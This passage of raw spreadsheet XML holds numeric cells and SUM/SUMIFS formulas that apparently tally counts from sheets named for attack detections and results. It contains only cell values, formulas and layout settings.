        <v>1415</v>
      </c>
      <c r="O3" s="203" t="s">
        <v>1414</v>
      </c>
      <c r="P3" s="204" t="s">
        <v>1415</v>
      </c>
      <c r="Q3" s="205" t="s">
        <v>1416</v>
      </c>
      <c r="R3" s="206"/>
      <c r="S3" s="206"/>
      <c r="T3" s="207"/>
      <c r="U3" s="207"/>
      <c r="V3" s="207"/>
    </row>
    <row r="4">
      <c r="A4" s="208" t="s">
        <v>1417</v>
      </c>
      <c r="B4" s="209" t="s">
        <v>1418</v>
      </c>
      <c r="C4" s="209" t="s">
        <v>1419</v>
      </c>
      <c r="D4" s="209" t="s">
        <v>1420</v>
      </c>
      <c r="E4" s="209">
        <v>2.0</v>
      </c>
      <c r="F4" s="209">
        <v>2.0</v>
      </c>
      <c r="G4" s="73" t="s">
        <v>12</v>
      </c>
      <c r="H4" s="209">
        <v>0.0</v>
      </c>
      <c r="I4" s="73" t="s">
        <v>12</v>
      </c>
      <c r="J4" s="209">
        <v>0.0</v>
      </c>
      <c r="K4" s="73" t="s">
        <v>12</v>
      </c>
      <c r="L4" s="209">
        <v>0.0</v>
      </c>
      <c r="M4" s="210" t="s">
        <v>1421</v>
      </c>
      <c r="N4" s="209">
        <v>1.0</v>
      </c>
      <c r="O4" s="209" t="s">
        <v>12</v>
      </c>
      <c r="P4" s="209" t="s">
        <v>12</v>
      </c>
      <c r="Q4" s="211" t="s">
        <v>187</v>
      </c>
      <c r="R4" s="206"/>
      <c r="S4" s="206"/>
      <c r="T4" s="207"/>
      <c r="U4" s="207"/>
      <c r="V4" s="207"/>
    </row>
    <row r="5">
      <c r="A5" s="208" t="s">
        <v>1422</v>
      </c>
      <c r="B5" s="209" t="s">
        <v>1418</v>
      </c>
      <c r="C5" s="209" t="s">
        <v>1419</v>
      </c>
      <c r="D5" s="209" t="s">
        <v>1423</v>
      </c>
      <c r="E5" s="209">
        <v>61.0</v>
      </c>
      <c r="F5" s="209">
        <v>16.0</v>
      </c>
      <c r="G5" s="73" t="s">
        <v>12</v>
      </c>
      <c r="H5" s="209">
        <v>0.0</v>
      </c>
      <c r="I5" s="73" t="s">
        <v>12</v>
      </c>
      <c r="J5" s="209">
        <v>0.0</v>
      </c>
      <c r="K5" s="73" t="s">
        <v>12</v>
      </c>
      <c r="L5" s="209">
        <v>0.0</v>
      </c>
      <c r="M5" s="209" t="s">
        <v>1424</v>
      </c>
      <c r="N5" s="209">
        <v>3.0</v>
      </c>
      <c r="O5" s="209" t="s">
        <v>12</v>
      </c>
      <c r="P5" s="209" t="s">
        <v>12</v>
      </c>
      <c r="Q5" s="211" t="s">
        <v>187</v>
      </c>
      <c r="R5" s="206"/>
      <c r="S5" s="206"/>
      <c r="T5" s="207"/>
      <c r="U5" s="207"/>
      <c r="V5" s="207"/>
    </row>
    <row r="6">
      <c r="A6" s="208" t="s">
        <v>1425</v>
      </c>
      <c r="B6" s="209" t="s">
        <v>1418</v>
      </c>
      <c r="C6" s="209" t="s">
        <v>1419</v>
      </c>
      <c r="D6" s="209" t="s">
        <v>1426</v>
      </c>
      <c r="E6" s="209">
        <v>40.0</v>
      </c>
      <c r="F6" s="209">
        <v>17.0</v>
      </c>
      <c r="G6" s="73" t="s">
        <v>12</v>
      </c>
      <c r="H6" s="209">
        <v>0.0</v>
      </c>
      <c r="I6" s="73" t="s">
        <v>12</v>
      </c>
      <c r="J6" s="209">
        <v>0.0</v>
      </c>
      <c r="K6" s="209">
        <v>51037.0</v>
      </c>
      <c r="L6" s="209">
        <v>1.0</v>
      </c>
      <c r="M6" s="209" t="s">
        <v>1427</v>
      </c>
      <c r="N6" s="209">
        <v>4.0</v>
      </c>
      <c r="O6" s="209" t="s">
        <v>12</v>
      </c>
      <c r="P6" s="209" t="s">
        <v>12</v>
      </c>
      <c r="Q6" s="211" t="s">
        <v>187</v>
      </c>
      <c r="R6" s="206"/>
      <c r="S6" s="206"/>
      <c r="T6" s="207"/>
      <c r="U6" s="207"/>
      <c r="V6" s="207"/>
    </row>
    <row r="7">
      <c r="A7" s="208" t="s">
        <v>1428</v>
      </c>
      <c r="B7" s="209" t="s">
        <v>1418</v>
      </c>
      <c r="C7" s="209" t="s">
        <v>1429</v>
      </c>
      <c r="D7" s="209" t="s">
        <v>1430</v>
      </c>
      <c r="E7" s="209">
        <v>15649.0</v>
      </c>
      <c r="F7" s="209">
        <v>2866.0</v>
      </c>
      <c r="G7" s="73" t="s">
        <v>12</v>
      </c>
      <c r="H7" s="209">
        <v>0.0</v>
      </c>
      <c r="I7" s="73" t="s">
        <v>1431</v>
      </c>
      <c r="J7" s="209">
        <v>10.0</v>
      </c>
      <c r="K7" s="209" t="s">
        <v>1431</v>
      </c>
      <c r="L7" s="209" t="s">
        <v>12</v>
      </c>
      <c r="M7" s="209" t="s">
        <v>1432</v>
      </c>
      <c r="N7" s="209">
        <v>29.0</v>
      </c>
      <c r="O7" s="209" t="s">
        <v>12</v>
      </c>
      <c r="P7" s="209" t="s">
        <v>12</v>
      </c>
      <c r="Q7" s="211" t="s">
        <v>187</v>
      </c>
      <c r="R7" s="206"/>
      <c r="S7" s="206"/>
      <c r="T7" s="207"/>
      <c r="U7" s="207"/>
      <c r="V7" s="207"/>
    </row>
    <row r="8">
      <c r="A8" s="208" t="s">
        <v>1433</v>
      </c>
      <c r="B8" s="209" t="s">
        <v>1418</v>
      </c>
      <c r="C8" s="209" t="s">
        <v>1429</v>
      </c>
      <c r="D8" s="209" t="s">
        <v>1434</v>
      </c>
      <c r="E8" s="209">
        <v>3421.0</v>
      </c>
      <c r="F8" s="209">
        <v>715.0</v>
      </c>
      <c r="G8" s="73" t="s">
        <v>12</v>
      </c>
      <c r="H8" s="209">
        <v>0.0</v>
      </c>
      <c r="I8" s="73" t="s">
        <v>1435</v>
      </c>
      <c r="J8" s="209">
        <v>2.0</v>
      </c>
      <c r="K8" s="209" t="s">
        <v>1435</v>
      </c>
      <c r="L8" s="209">
        <v>2.0</v>
      </c>
      <c r="M8" s="209" t="s">
        <v>1436</v>
      </c>
      <c r="N8" s="209">
        <v>14.0</v>
      </c>
      <c r="O8" s="209" t="s">
        <v>12</v>
      </c>
      <c r="P8" s="209" t="s">
        <v>12</v>
      </c>
      <c r="Q8" s="211" t="s">
        <v>187</v>
      </c>
      <c r="R8" s="206"/>
      <c r="S8" s="206"/>
      <c r="T8" s="207"/>
      <c r="U8" s="207"/>
      <c r="V8" s="207"/>
    </row>
    <row r="9">
      <c r="A9" s="208" t="s">
        <v>1437</v>
      </c>
      <c r="B9" s="209" t="s">
        <v>1418</v>
      </c>
      <c r="C9" s="209" t="s">
        <v>1429</v>
      </c>
      <c r="D9" s="209" t="s">
        <v>1438</v>
      </c>
      <c r="E9" s="209">
        <v>44016.0</v>
      </c>
      <c r="F9" s="209">
        <v>7531.0</v>
      </c>
      <c r="G9" s="73" t="s">
        <v>12</v>
      </c>
      <c r="H9" s="209">
        <v>0.0</v>
      </c>
      <c r="I9" s="73" t="s">
        <v>1439</v>
      </c>
      <c r="J9" s="209">
        <v>5.0</v>
      </c>
      <c r="K9" s="209" t="s">
        <v>1439</v>
      </c>
      <c r="L9" s="209">
        <v>5.0</v>
      </c>
      <c r="M9" s="209" t="s">
        <v>1440</v>
      </c>
      <c r="N9" s="209">
        <v>20.0</v>
      </c>
      <c r="O9" s="209" t="s">
        <v>12</v>
      </c>
      <c r="P9" s="209" t="s">
        <v>12</v>
      </c>
      <c r="Q9" s="211" t="s">
        <v>187</v>
      </c>
      <c r="R9" s="206"/>
      <c r="S9" s="206"/>
      <c r="T9" s="207"/>
      <c r="U9" s="207"/>
      <c r="V9" s="207"/>
    </row>
    <row r="10">
      <c r="A10" s="208" t="s">
        <v>1441</v>
      </c>
      <c r="B10" s="209" t="s">
        <v>1418</v>
      </c>
      <c r="C10" s="209" t="s">
        <v>1429</v>
      </c>
      <c r="D10" s="209" t="s">
        <v>1442</v>
      </c>
      <c r="E10" s="209">
        <v>56302.0</v>
      </c>
      <c r="F10" s="209">
        <v>3096.0</v>
      </c>
      <c r="G10" s="73" t="s">
        <v>12</v>
      </c>
      <c r="H10" s="209">
        <v>0.0</v>
      </c>
      <c r="I10" s="73" t="s">
        <v>1443</v>
      </c>
      <c r="J10" s="209">
        <v>3.0</v>
      </c>
      <c r="K10" s="209" t="s">
        <v>1443</v>
      </c>
      <c r="L10" s="209">
        <v>3.0</v>
      </c>
      <c r="M10" s="209" t="s">
        <v>1444</v>
      </c>
      <c r="N10" s="209">
        <v>20.0</v>
      </c>
      <c r="O10" s="209" t="s">
        <v>12</v>
      </c>
      <c r="P10" s="209" t="s">
        <v>12</v>
      </c>
      <c r="Q10" s="211" t="s">
        <v>187</v>
      </c>
      <c r="R10" s="206"/>
      <c r="S10" s="206"/>
      <c r="T10" s="207"/>
      <c r="U10" s="207"/>
      <c r="V10" s="207"/>
    </row>
    <row r="11">
      <c r="A11" s="208" t="s">
        <v>1445</v>
      </c>
      <c r="B11" s="209" t="s">
        <v>1418</v>
      </c>
      <c r="C11" s="209" t="s">
        <v>1429</v>
      </c>
      <c r="D11" s="209" t="s">
        <v>1446</v>
      </c>
      <c r="E11" s="209">
        <v>64674.0</v>
      </c>
      <c r="F11" s="209">
        <v>6565.0</v>
      </c>
      <c r="G11" s="73" t="s">
        <v>12</v>
      </c>
      <c r="H11" s="209">
        <v>0.0</v>
      </c>
      <c r="I11" s="73" t="s">
        <v>1447</v>
      </c>
      <c r="J11" s="209">
        <v>4.0</v>
      </c>
      <c r="K11" s="209" t="s">
        <v>1447</v>
      </c>
      <c r="L11" s="209">
        <v>4.0</v>
      </c>
      <c r="M11" s="209" t="s">
        <v>1448</v>
      </c>
      <c r="N11" s="209">
        <v>19.0</v>
      </c>
      <c r="O11" s="209" t="s">
        <v>12</v>
      </c>
      <c r="P11" s="209" t="s">
        <v>12</v>
      </c>
      <c r="Q11" s="211" t="s">
        <v>187</v>
      </c>
      <c r="R11" s="206"/>
      <c r="S11" s="206"/>
      <c r="T11" s="207"/>
      <c r="U11" s="207"/>
      <c r="V11" s="207"/>
    </row>
    <row r="12">
      <c r="A12" s="208" t="s">
        <v>1449</v>
      </c>
      <c r="B12" s="209" t="s">
        <v>1418</v>
      </c>
      <c r="C12" s="209" t="s">
        <v>1429</v>
      </c>
      <c r="D12" s="209" t="s">
        <v>1450</v>
      </c>
      <c r="E12" s="209">
        <v>65257.0</v>
      </c>
      <c r="F12" s="209">
        <v>4702.0</v>
      </c>
      <c r="G12" s="73" t="s">
        <v>12</v>
      </c>
      <c r="H12" s="209">
        <v>0.0</v>
      </c>
      <c r="I12" s="73" t="s">
        <v>1451</v>
      </c>
      <c r="J12" s="209">
        <v>5.0</v>
      </c>
      <c r="K12" s="209" t="s">
        <v>1451</v>
      </c>
      <c r="L12" s="209">
        <v>5.0</v>
      </c>
      <c r="M12" s="209" t="s">
        <v>1452</v>
      </c>
      <c r="N12" s="209">
        <v>24.0</v>
      </c>
      <c r="O12" s="209" t="s">
        <v>12</v>
      </c>
      <c r="P12" s="209" t="s">
        <v>12</v>
      </c>
      <c r="Q12" s="211" t="s">
        <v>187</v>
      </c>
      <c r="R12" s="206"/>
      <c r="S12" s="206"/>
      <c r="T12" s="207"/>
      <c r="U12" s="207"/>
      <c r="V12" s="207"/>
    </row>
    <row r="13">
      <c r="A13" s="208" t="s">
        <v>1453</v>
      </c>
      <c r="B13" s="209" t="s">
        <v>1418</v>
      </c>
      <c r="C13" s="209" t="s">
        <v>1429</v>
      </c>
      <c r="D13" s="209" t="s">
        <v>1454</v>
      </c>
      <c r="E13" s="209">
        <v>32428.0</v>
      </c>
      <c r="F13" s="209">
        <v>3104.0</v>
      </c>
      <c r="G13" s="73" t="s">
        <v>12</v>
      </c>
      <c r="H13" s="209">
        <v>0.0</v>
      </c>
      <c r="I13" s="73" t="s">
        <v>1447</v>
      </c>
      <c r="J13" s="209">
        <v>4.0</v>
      </c>
      <c r="K13" s="209" t="s">
        <v>1447</v>
      </c>
      <c r="L13" s="209">
        <v>4.0</v>
      </c>
      <c r="M13" s="209" t="s">
        <v>1455</v>
      </c>
      <c r="N13" s="209">
        <v>22.0</v>
      </c>
      <c r="O13" s="209" t="s">
        <v>12</v>
      </c>
      <c r="P13" s="209" t="s">
        <v>12</v>
      </c>
      <c r="Q13" s="211" t="s">
        <v>187</v>
      </c>
      <c r="R13" s="206"/>
      <c r="S13" s="206"/>
      <c r="T13" s="207"/>
      <c r="U13" s="207"/>
      <c r="V13" s="207"/>
    </row>
    <row r="14">
      <c r="A14" s="212" t="s">
        <v>1456</v>
      </c>
      <c r="B14" s="213" t="s">
        <v>12</v>
      </c>
      <c r="C14" s="213" t="s">
        <v>12</v>
      </c>
      <c r="D14" s="213" t="s">
        <v>12</v>
      </c>
      <c r="E14" s="213">
        <f t="shared" ref="E14:F14" si="1">SUM(E4:E13)</f>
        <v>281850</v>
      </c>
      <c r="F14" s="213">
        <f t="shared" si="1"/>
        <v>28614</v>
      </c>
      <c r="G14" s="120" t="s">
        <v>12</v>
      </c>
      <c r="H14" s="214">
        <v>0.0</v>
      </c>
      <c r="I14" s="120" t="s">
        <v>1457</v>
      </c>
      <c r="J14" s="214">
        <v>14.0</v>
      </c>
      <c r="K14" s="215" t="s">
        <v>1458</v>
      </c>
      <c r="L14" s="214">
        <v>15.0</v>
      </c>
      <c r="M14" s="215" t="s">
        <v>1459</v>
      </c>
      <c r="N14" s="214">
        <v>43.0</v>
      </c>
      <c r="O14" s="215" t="s">
        <v>12</v>
      </c>
      <c r="P14" s="215" t="s">
        <v>12</v>
      </c>
      <c r="Q14" s="216" t="s">
        <v>12</v>
      </c>
      <c r="R14" s="198"/>
      <c r="S14" s="198"/>
    </row>
    <row r="15">
      <c r="R15" s="198"/>
      <c r="S15" s="198"/>
    </row>
    <row r="16">
      <c r="A16" s="198"/>
      <c r="B16" s="198"/>
      <c r="C16" s="198"/>
      <c r="D16" s="198"/>
      <c r="E16" s="198"/>
      <c r="F16" s="198"/>
      <c r="G16" s="198"/>
      <c r="H16" s="198"/>
      <c r="I16" s="198"/>
      <c r="J16" s="198"/>
      <c r="K16" s="198"/>
      <c r="L16" s="198"/>
      <c r="M16" s="198"/>
      <c r="N16" s="198"/>
      <c r="O16" s="198"/>
      <c r="P16" s="198"/>
      <c r="Q16" s="198"/>
      <c r="R16" s="198"/>
      <c r="S16" s="198"/>
    </row>
    <row r="17">
      <c r="A17" s="198"/>
      <c r="B17" s="198"/>
      <c r="C17" s="198"/>
      <c r="D17" s="198"/>
      <c r="E17" s="198"/>
      <c r="F17" s="198"/>
      <c r="G17" s="198"/>
      <c r="H17" s="198"/>
      <c r="I17" s="198"/>
      <c r="J17" s="198"/>
      <c r="K17" s="198"/>
      <c r="L17" s="217"/>
      <c r="M17" s="198"/>
      <c r="N17" s="198"/>
      <c r="O17" s="198"/>
      <c r="P17" s="198"/>
      <c r="Q17" s="198"/>
      <c r="R17" s="198"/>
      <c r="S17" s="198"/>
    </row>
    <row r="18">
      <c r="A18" s="198"/>
      <c r="B18" s="198"/>
      <c r="C18" s="198"/>
      <c r="D18" s="198"/>
      <c r="E18" s="198"/>
      <c r="F18" s="198"/>
      <c r="G18" s="198"/>
      <c r="H18" s="198"/>
      <c r="I18" s="198"/>
      <c r="J18" s="198"/>
      <c r="K18" s="198"/>
      <c r="L18" s="198"/>
      <c r="M18" s="198"/>
      <c r="N18" s="198"/>
      <c r="O18" s="198"/>
      <c r="P18" s="198"/>
      <c r="Q18" s="198"/>
      <c r="R18" s="198"/>
      <c r="S18" s="198"/>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="G2:H2"/>
    <mergeCell ref="I2:J2"/>
    <mergeCell ref="K2:L2"/>
    <mergeCell ref="M2:N2"/>
    <mergeCell ref="O2:P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4.25"/>
    <col customWidth="1" min="4" max="4" width="13.88"/>
    <col customWidth="1" min="5" max="5" width="14.0"/>
    <col customWidth="1" min="6" max="6" width="20.13"/>
    <col customWidth="1" min="7" max="7" width="14.0"/>
    <col customWidth="1" min="8" max="8" width="17.13"/>
    <col customWidth="1" min="9" max="10" width="28.75"/>
    <col customWidth="1" min="15" max="15" width="18.88"/>
    <col customWidth="1" min="17" max="17" width="27.13"/>
    <col customWidth="1" min="22" max="22" width="18.88"/>
    <col customWidth="1" min="24" max="24" width="29.38"/>
    <col customWidth="1" min="31" max="31" width="36.13"/>
    <col customWidth="1" min="32" max="32" width="37.13"/>
  </cols>
  <sheetData>
    <row r="8">
      <c r="C8" s="218" t="s">
        <v>1460</v>
      </c>
      <c r="D8" s="53"/>
      <c r="E8" s="53"/>
      <c r="F8" s="54"/>
      <c r="G8" s="219"/>
      <c r="H8" s="219"/>
      <c r="I8" s="220"/>
      <c r="J8" s="221" t="s">
        <v>1461</v>
      </c>
      <c r="K8" s="53"/>
      <c r="L8" s="53"/>
      <c r="M8" s="53"/>
      <c r="N8" s="53"/>
      <c r="O8" s="54"/>
      <c r="Q8" s="221" t="s">
        <v>1462</v>
      </c>
      <c r="R8" s="53"/>
      <c r="S8" s="53"/>
      <c r="T8" s="53"/>
      <c r="U8" s="53"/>
      <c r="V8" s="54"/>
      <c r="X8" s="221" t="s">
        <v>1463</v>
      </c>
      <c r="Y8" s="53"/>
      <c r="Z8" s="53"/>
      <c r="AA8" s="53"/>
      <c r="AB8" s="53"/>
      <c r="AC8" s="54"/>
      <c r="AJ8" s="221" t="s">
        <v>1464</v>
      </c>
      <c r="AK8" s="53"/>
      <c r="AL8" s="53"/>
      <c r="AM8" s="53"/>
      <c r="AN8" s="54"/>
      <c r="AO8" s="220"/>
      <c r="AP8" s="220"/>
      <c r="AQ8" s="220"/>
      <c r="AR8" s="220"/>
      <c r="AS8" s="220"/>
    </row>
    <row r="9">
      <c r="C9" s="222" t="s">
        <v>1465</v>
      </c>
      <c r="D9" s="223" t="s">
        <v>16</v>
      </c>
      <c r="E9" s="223" t="s">
        <v>14</v>
      </c>
      <c r="F9" s="224" t="s">
        <v>18</v>
      </c>
      <c r="G9" s="225"/>
      <c r="H9" s="225"/>
      <c r="I9" s="225"/>
      <c r="J9" s="222" t="s">
        <v>1466</v>
      </c>
      <c r="K9" s="223" t="s">
        <v>6</v>
      </c>
      <c r="L9" s="223" t="s">
        <v>7</v>
      </c>
      <c r="M9" s="223" t="s">
        <v>8</v>
      </c>
      <c r="N9" s="223" t="s">
        <v>9</v>
      </c>
      <c r="O9" s="224" t="s">
        <v>1467</v>
      </c>
      <c r="Q9" s="222" t="s">
        <v>1466</v>
      </c>
      <c r="R9" s="223" t="s">
        <v>6</v>
      </c>
      <c r="S9" s="223" t="s">
        <v>7</v>
      </c>
      <c r="T9" s="223" t="s">
        <v>8</v>
      </c>
      <c r="U9" s="223" t="s">
        <v>9</v>
      </c>
      <c r="V9" s="224" t="s">
        <v>1468</v>
      </c>
      <c r="X9" s="222" t="s">
        <v>1466</v>
      </c>
      <c r="Y9" s="223" t="s">
        <v>6</v>
      </c>
      <c r="Z9" s="223" t="s">
        <v>7</v>
      </c>
      <c r="AA9" s="223" t="s">
        <v>8</v>
      </c>
      <c r="AB9" s="223" t="s">
        <v>9</v>
      </c>
      <c r="AC9" s="224" t="s">
        <v>1469</v>
      </c>
      <c r="AJ9" s="226" t="s">
        <v>1466</v>
      </c>
      <c r="AK9" s="227" t="s">
        <v>6</v>
      </c>
      <c r="AL9" s="227" t="s">
        <v>7</v>
      </c>
      <c r="AM9" s="227" t="s">
        <v>8</v>
      </c>
      <c r="AN9" s="228" t="s">
        <v>9</v>
      </c>
      <c r="AO9" s="225"/>
      <c r="AP9" s="225"/>
      <c r="AQ9" s="225"/>
      <c r="AR9" s="225"/>
      <c r="AS9" s="225"/>
    </row>
    <row r="10" ht="19.5" customHeight="1">
      <c r="C10" s="229">
        <v>4022.0</v>
      </c>
      <c r="D10" s="230">
        <v>35763.0</v>
      </c>
      <c r="E10" s="230">
        <v>41529.0</v>
      </c>
      <c r="F10" s="231">
        <v>12067.0</v>
      </c>
      <c r="G10" s="232"/>
      <c r="H10" s="232"/>
      <c r="I10" s="232"/>
      <c r="J10" s="233" t="s">
        <v>97</v>
      </c>
      <c r="K10" s="234">
        <v>1.0</v>
      </c>
      <c r="L10" s="234">
        <v>2.0</v>
      </c>
      <c r="M10" s="234">
        <v>2.0</v>
      </c>
      <c r="N10" s="234">
        <v>2.0</v>
      </c>
      <c r="O10" s="235">
        <v>3.0</v>
      </c>
      <c r="Q10" s="236" t="s">
        <v>97</v>
      </c>
      <c r="R10" s="237">
        <v>1.0</v>
      </c>
      <c r="S10" s="237">
        <v>3.0</v>
      </c>
      <c r="T10" s="237">
        <v>3.0</v>
      </c>
      <c r="U10" s="237">
        <v>3.0</v>
      </c>
      <c r="V10" s="238">
        <f>'(D) - Resultados I'!AC37</f>
        <v>5</v>
      </c>
      <c r="X10" s="236" t="s">
        <v>97</v>
      </c>
      <c r="Y10" s="237">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X10)</f>
        <v>46</v>
      </c>
      <c r="Z10" s="237">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X10)</f>
        <v>73</v>
      </c>
      <c r="AA10" s="237">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X10)</f>
        <v>87</v>
      </c>
      <c r="AB10" s="237">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X10)</f>
        <v>116</v>
      </c>
      <c r="AC10" s="238">
        <f t="shared" ref="AC10:AC22" si="2">AB10</f>
        <v>116</v>
      </c>
      <c r="AD10" s="234"/>
      <c r="AF10" s="234"/>
      <c r="AJ10" s="236" t="s">
        <v>97</v>
      </c>
      <c r="AK10" s="239">
        <f t="shared" ref="AK10:AN10" si="1">Y10/$V10</f>
        <v>9.2</v>
      </c>
      <c r="AL10" s="239">
        <f t="shared" si="1"/>
        <v>14.6</v>
      </c>
      <c r="AM10" s="239">
        <f t="shared" si="1"/>
        <v>17.4</v>
      </c>
      <c r="AN10" s="240">
        <f t="shared" si="1"/>
        <v>23.2</v>
      </c>
      <c r="AO10" s="234"/>
      <c r="AP10" s="234"/>
      <c r="AQ10" s="234"/>
      <c r="AR10" s="234"/>
      <c r="AS10" s="234"/>
    </row>
    <row r="11">
      <c r="C11" s="232"/>
      <c r="D11" s="232"/>
      <c r="E11" s="232"/>
      <c r="F11" s="232"/>
      <c r="G11" s="232"/>
      <c r="H11" s="232"/>
      <c r="I11" s="232"/>
      <c r="J11" s="233" t="s">
        <v>204</v>
      </c>
      <c r="K11" s="234">
        <v>0.0</v>
      </c>
      <c r="L11" s="234">
        <v>0.0</v>
      </c>
      <c r="M11" s="234">
        <v>0.0</v>
      </c>
      <c r="N11" s="234">
        <v>0.0</v>
      </c>
      <c r="O11" s="235">
        <v>1.0</v>
      </c>
      <c r="Q11" s="233" t="s">
        <v>204</v>
      </c>
      <c r="R11" s="234">
        <v>0.0</v>
      </c>
      <c r="S11" s="234">
        <v>0.0</v>
      </c>
      <c r="T11" s="234">
        <v>0.0</v>
      </c>
      <c r="U11" s="234">
        <v>0.0</v>
      </c>
      <c r="V11" s="235">
        <f>'(D) - Resultados I'!AC38</f>
        <v>1</v>
      </c>
      <c r="X11" s="233" t="s">
        <v>204</v>
      </c>
      <c r="Y11" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X11)</f>
        <v>44</v>
      </c>
      <c r="Z11" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X11)</f>
        <v>59</v>
      </c>
      <c r="AA11" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X11)</f>
        <v>65</v>
      </c>
      <c r="AB11" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X11)</f>
        <v>79</v>
      </c>
      <c r="AC11" s="235">
        <f t="shared" si="2"/>
        <v>79</v>
      </c>
      <c r="AD11" s="234"/>
      <c r="AF11" s="234"/>
      <c r="AJ11" s="233" t="s">
        <v>204</v>
      </c>
      <c r="AK11" s="241">
        <f t="shared" ref="AK11:AN11" si="3">Y11/$V11</f>
        <v>44</v>
      </c>
      <c r="AL11" s="241">
        <f t="shared" si="3"/>
        <v>59</v>
      </c>
      <c r="AM11" s="241">
        <f t="shared" si="3"/>
        <v>65</v>
      </c>
      <c r="AN11" s="242">
        <f t="shared" si="3"/>
        <v>79</v>
      </c>
      <c r="AO11" s="234"/>
      <c r="AP11" s="234"/>
      <c r="AQ11" s="234"/>
      <c r="AR11" s="234"/>
      <c r="AS11" s="234"/>
    </row>
    <row r="12">
      <c r="C12" s="232"/>
      <c r="D12" s="232"/>
      <c r="E12" s="232"/>
      <c r="F12" s="232"/>
      <c r="G12" s="232"/>
      <c r="H12" s="232"/>
      <c r="I12" s="232"/>
      <c r="J12" s="233" t="s">
        <v>261</v>
      </c>
      <c r="K12" s="234">
        <v>2.0</v>
      </c>
      <c r="L12" s="234">
        <v>2.0</v>
      </c>
      <c r="M12" s="234">
        <v>3.0</v>
      </c>
      <c r="N12" s="234">
        <v>4.0</v>
      </c>
      <c r="O12" s="235">
        <v>5.0</v>
      </c>
      <c r="Q12" s="233" t="s">
        <v>261</v>
      </c>
      <c r="R12" s="234">
        <v>2.0</v>
      </c>
      <c r="S12" s="234">
        <v>2.0</v>
      </c>
      <c r="T12" s="234">
        <v>3.0</v>
      </c>
      <c r="U12" s="234">
        <v>4.0</v>
      </c>
      <c r="V12" s="235">
        <f>'(D) - Resultados I'!AC39</f>
        <v>8</v>
      </c>
      <c r="X12" s="233" t="s">
        <v>261</v>
      </c>
      <c r="Y12" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X12)</f>
        <v>6</v>
      </c>
      <c r="Z12" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X12)</f>
        <v>13</v>
      </c>
      <c r="AA12" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X12)</f>
        <v>21</v>
      </c>
      <c r="AB12" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X12)</f>
        <v>53</v>
      </c>
      <c r="AC12" s="235">
        <f t="shared" si="2"/>
        <v>53</v>
      </c>
      <c r="AD12" s="234"/>
      <c r="AF12" s="234"/>
      <c r="AJ12" s="233" t="s">
        <v>261</v>
      </c>
      <c r="AK12" s="241">
        <f t="shared" ref="AK12:AN12" si="4">Y12/$V12</f>
        <v>0.75</v>
      </c>
      <c r="AL12" s="241">
        <f t="shared" si="4"/>
        <v>1.625</v>
      </c>
      <c r="AM12" s="241">
        <f t="shared" si="4"/>
        <v>2.625</v>
      </c>
      <c r="AN12" s="242">
        <f t="shared" si="4"/>
        <v>6.625</v>
      </c>
      <c r="AO12" s="234"/>
      <c r="AP12" s="234"/>
      <c r="AQ12" s="234"/>
      <c r="AR12" s="234"/>
      <c r="AS12" s="234"/>
    </row>
    <row r="13">
      <c r="C13" s="232"/>
      <c r="D13" s="232"/>
      <c r="E13" s="232"/>
      <c r="F13" s="232"/>
      <c r="G13" s="232"/>
      <c r="H13" s="232"/>
      <c r="I13" s="232"/>
      <c r="J13" s="233" t="s">
        <v>262</v>
      </c>
      <c r="K13" s="234">
        <v>0.0</v>
      </c>
      <c r="L13" s="234">
        <v>1.0</v>
      </c>
      <c r="M13" s="234">
        <v>2.0</v>
      </c>
      <c r="N13" s="234">
        <v>2.0</v>
      </c>
      <c r="O13" s="235">
        <v>4.0</v>
      </c>
      <c r="Q13" s="233" t="s">
        <v>262</v>
      </c>
      <c r="R13" s="234">
        <v>0.0</v>
      </c>
      <c r="S13" s="234">
        <v>1.0</v>
      </c>
      <c r="T13" s="234">
        <v>3.0</v>
      </c>
      <c r="U13" s="234">
        <v>3.0</v>
      </c>
      <c r="V13" s="235">
        <f>'(D) - Resultados I'!AC40</f>
        <v>5</v>
      </c>
      <c r="X13" s="233" t="s">
        <v>262</v>
      </c>
      <c r="Y13" s="234">
